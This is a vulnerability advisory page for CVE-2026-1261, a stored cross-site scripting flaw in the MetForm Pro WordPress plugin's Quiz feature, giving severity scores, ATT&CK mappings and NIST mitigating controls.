Cyber Resilience

CVE-2026-1261

High

Published: 10 March 2026

Published
10 March 2026
Modified
22 April 2026
KEV Added
Patch
CVSS Score v3.1 7.2 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
EPSS Score 0.0014 33.7th percentile
Risk Priority 14 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2026-1261 is a high-severity Cross-site Scripting (CWE-79) vulnerability in Wordpress (inferred from references). Its CVSS base score is 7.2 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked at the 33.7th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).

Deeper analysis

CVE-2026-1261 is a stored cross-site scripting (XSS) vulnerability, classified under CWE-79, in the MetForm Pro plugin for WordPress. It affects the Quiz feature in all versions up to and including 3.9.6 due to insufficient input sanitization and output escaping. Published on 2026-03-10, the vulnerability has a CVSS v3.1 base score of 7.2 (AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N).

Unauthenticated attackers can exploit this vulnerability remotely over the network with low attack complexity, no privileges required, and no user interaction needed. By submitting malicious input through the Quiz feature, attackers inject arbitrary web scripts into pages, which then execute in users' browsers whenever those pages are accessed, enabling potential theft of session data or further compromise.

Advisories and code references highlight specific issues in the plugin's loader.php file at lines 69, 85, and 121 in version 3.9.5. Mitigation details are available in the Wordfence threat intelligence report and the plugin roadmap on wpmet.com/plugin/metform/roadmaps/.

EU & UK References

Vulnerability details

The MetForm Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Quiz feature in all versions up to, and including, 3.9.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to…

more

inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1059.007 JavaScript Execution
Adversaries may abuse various implementations of JavaScript for execution.
Why these techniques?

Stored XSS in public-facing WordPress plugin directly enables remote exploitation of web application (T1190) and arbitrary JavaScript execution in victim browsers (T1059.007).

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

CVEs Like This One

CVE-2026-3231Shared CWE-79
CVE-2025-23481Shared CWE-79
CVE-2025-69302Shared CWE-79
CVE-2025-23734Shared CWE-79
CVE-2025-23571Shared CWE-79
CVE-2025-65110Shared CWE-79
CVE-2026-24948Shared CWE-79
CVE-2025-27352Shared CWE-79
CVE-2025-30349Shared CWE-79
CVE-2026-3876Shared CWE-79

Affected Assets

Wordpress
inferred from references and description; NVD did not file a CPE for this CVE

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Directly requires validation of all inputs to the Quiz feature, blocking the unsanitized malicious payloads that enable stored XSS.

prevent

Mandates output filtering/escaping on rendered pages, preventing injected scripts from executing in user browsers.

preventdetect

Provides malicious-code detection and blocking mechanisms that can catch or neutralize the web scripts injected via the vulnerable plugin.

References